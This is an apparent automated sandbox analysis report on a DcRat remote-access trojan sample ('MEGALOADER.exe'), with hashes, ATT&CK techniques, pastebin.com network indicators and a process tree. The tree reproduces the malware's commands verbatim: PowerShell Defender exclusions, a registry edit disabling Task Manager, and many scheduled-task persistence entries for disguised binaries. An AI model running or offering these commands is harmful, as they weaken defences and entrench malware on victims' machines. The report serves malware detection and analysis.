dcrat | f5fb3ae5ca25c16f178ca10c99aa7b4af70dc38fd806aef46d662c6ab40aab78

Resubmissions

30-06-2024 12:39

240630-pvta8a1drr 10

Analysis

max time kernel
1s
max time network
88s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
30-06-2024 12:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MEGALOADER.exe
Size

1.7MB
MD5

ac4c9d6cd24a44a660c69bf7b55f17b0
SHA1

e41107db8aad88bb26d1879db7aed31e91942644
SHA256

f5fb3ae5ca25c16f178ca10c99aa7b4af70dc38fd806aef46d662c6ab40aab78
SHA512

0b1ee2a0c3a1c73d9ce53111df250c2c36d4dcc38ac9426bede09c8eb9a274aadb671e86018073c62abd7c09726ff878ccf1001240754e9bef3948e0a2130c4f
SSDEEP

24576:O2G/nvxW3Wir0g0bcg1vqd25Gl35KcbOwGqq+AZbPxtDSk5/FX5vDlIXNQdSR:ObA3dogGy/3dSnEYFJvxSN

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4056	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4316	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4656	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3400	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	728	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3452	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	460	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3828	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	828	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3204	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1424	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	780	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	60	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3808	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	60	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4824	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4532	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4772	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4428	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3136	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3372	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3804	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	400	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4720	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4868	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1464	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1460	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	440	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4424	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	2876	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	2876	schtasks.exe

DCRat payload 2 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
rat

Processes:

resource yara_rule

C:\DriverSavessessionbroker\containerPerf.exe dcrat
behavioral1/memory/5032-14-0x0000000000170000-0x00000000002C6000-memory.dmp dcrat

resource	yara_rule
C:\DriverSavessessionbroker\containerPerf.exe	dcrat
behavioral1/memory/5032-14-0x0000000000170000-0x00000000002C6000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5100	powershell.exe
3544	powershell.exe
4496	powershell.exe
2948	powershell.exe
4616	powershell.exe
5036	powershell.exe
2940	powershell.exe
4524	powershell.exe
896	powershell.exe
1820	powershell.exe
460	powershell.exe
2432	powershell.exe
4860	powershell.exe
1548	powershell.exe
204	powershell.exe
4520	powershell.exe
244	powershell.exe
4288	powershell.exe
1604	powershell.exe
3108	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

49 pastebin.com
50 pastebin.com
51 pastebin.com
71 pastebin.com
85 pastebin.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

MEGALOADER.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings MEGALOADER.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3800 reg.exe

flow	ioc
49	pastebin.com
50	pastebin.com
51	pastebin.com
71	pastebin.com
85	pastebin.com

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	MEGALOADER.exe

pid	process
3800	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
2004	schtasks.exe
828	schtasks.exe
1732	schtasks.exe
4340	schtasks.exe
460	schtasks.exe
3828	schtasks.exe
3204	schtasks.exe
1736	schtasks.exe
3372	schtasks.exe
4532	schtasks.exe
728	schtasks.exe
1424	schtasks.exe
4428	schtasks.exe
3136	schtasks.exe
4280	schtasks.exe
5080	schtasks.exe
4656	schtasks.exe
3804	schtasks.exe
400	schtasks.exe
4892	schtasks.exe
4056	schtasks.exe
3400	schtasks.exe
2936	schtasks.exe
4772	schtasks.exe
208	schtasks.exe
3452	schtasks.exe
2112	schtasks.exe
2716	schtasks.exe
2832	schtasks.exe
2224	schtasks.exe
4392	schtasks.exe
1460	schtasks.exe
780	schtasks.exe
4320	schtasks.exe
4316	schtasks.exe
4292	schtasks.exe
4868	schtasks.exe
440	schtasks.exe
4836	schtasks.exe
2348	schtasks.exe
60	schtasks.exe
220	schtasks.exe
60	schtasks.exe
4824	schtasks.exe
4436	schtasks.exe
1776	schtasks.exe
3808	schtasks.exe
2144	schtasks.exe
1976	schtasks.exe
1464	schtasks.exe
4424	schtasks.exe
2312	schtasks.exe
5024	schtasks.exe
4720	schtasks.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

MEGALOADER.exe

description	pid	process	target process
PID 1384 wrote to memory of 4472	1384	MEGALOADER.exe	WScript.exe
PID 1384 wrote to memory of 4472	1384	MEGALOADER.exe	WScript.exe
PID 1384 wrote to memory of 4472	1384	MEGALOADER.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\MEGALOADER.exe
"C:\Users\Admin\AppData\Local\Temp\MEGALOADER.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverSavessessionbroker\xFrhwR4IIWv.vbe"
2⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\DriverSavessessionbroker\BB4HCuNIVdx078g7AY04mw7MSmeo.bat" "
3⤵
PID:1008

C:\DriverSavessessionbroker\containerPerf.exe
"C:\DriverSavessessionbroker\containerPerf.exe"
4⤵
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriverSavessessionbroker\containerPerf.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IME\en-US\winlogon.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\dwm.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\OfficeClickToRun.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Videos\dllhost.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sppsvc.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\explorer.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\csrss.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriverSavessessionbroker\csrss.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\smss.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriverSavessessionbroker\OfficeClickToRun.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\unsecapp.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\explorer.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\en-US\unsecapp.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\it-IT\RuntimeBroker.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1548

C:\DriverSavessessionbroker\containerPerf.exe
"C:\DriverSavessessionbroker\containerPerf.exe"
5⤵
PID:4180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriverSavessessionbroker\containerPerf.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriverSavessessionbroker\conhost.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Adobe\Reader\ApplicationFrameHost.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HPJZN0gsBU.bat"
6⤵
PID:5292

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:5580

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
7⤵
PID:5552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\53b6b892-4054-4f11-8ff5-b4b1e278fc5f.vbs"
8⤵
PID:6892

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
9⤵
PID:5912

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f08cea4-f4f5-4895-93c0-14128c68a49d.vbs"
10⤵
PID:4312

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
11⤵
PID:6464

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a14daa3a-0019-49a2-abbe-62f78859399c.vbs"
12⤵
PID:4664

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
13⤵
PID:3820

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4b664ef-c86b-496a-9ca5-a9590ddb7f94.vbs"
14⤵
PID:6568

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
15⤵
PID:1408

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\42420c71-fd45-4129-9c72-32aa3d85dd5d.vbs"
16⤵
PID:3520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aad4930e-cfec-4e08-a906-58ca17a7bce6.vbs"
16⤵
PID:4520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a496114c-b184-4ee7-89cb-d7986d4ad9da.vbs"
14⤵
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3npectBbsF.bat"
14⤵
PID:4304

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
15⤵
PID:6988

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
15⤵
PID:4800

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\758471b2-f26a-4cd7-abed-2b8295a1d1c7.vbs"
12⤵
PID:4528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ezHXLeVHih.bat"
12⤵
PID:6872

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
13⤵
PID:5184

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
13⤵
PID:5384

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033f9d38-d869-4f1b-b6cc-d2ae7ea55a7c.vbs"
10⤵
PID:6052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BYj1kG62r9.bat"
10⤵
PID:6376

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
11⤵
PID:776

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
11⤵
PID:628

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f6874a1b-1d49-4259-ab6d-df92f726fd91.vbs"
8⤵
PID:5292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yMeEqlK1gO.bat"
8⤵
PID:1956

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:4952

C:\Program Files\WindowsPowerShell\powershell.exe
"C:\Program Files\WindowsPowerShell\powershell.exe"
9⤵
PID:6164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
- Modifies registry key
PID:3800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\IME\en-US\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\IME\en-US\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Windows\IME\en-US\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Start Menu\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Start Menu\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Videos\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\Videos\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Videos\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Windows\Fonts\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Fonts\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Windows\Fonts\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\twain_32\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\DriverSavessessionbroker\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\DriverSavessessionbroker\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\DriverSavessessionbroker\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\DriverSavessessionbroker\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\DriverSavessessionbroker\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\DriverSavessessionbroker\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Public\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2144

C:\Windows\system32\schtasks.exe
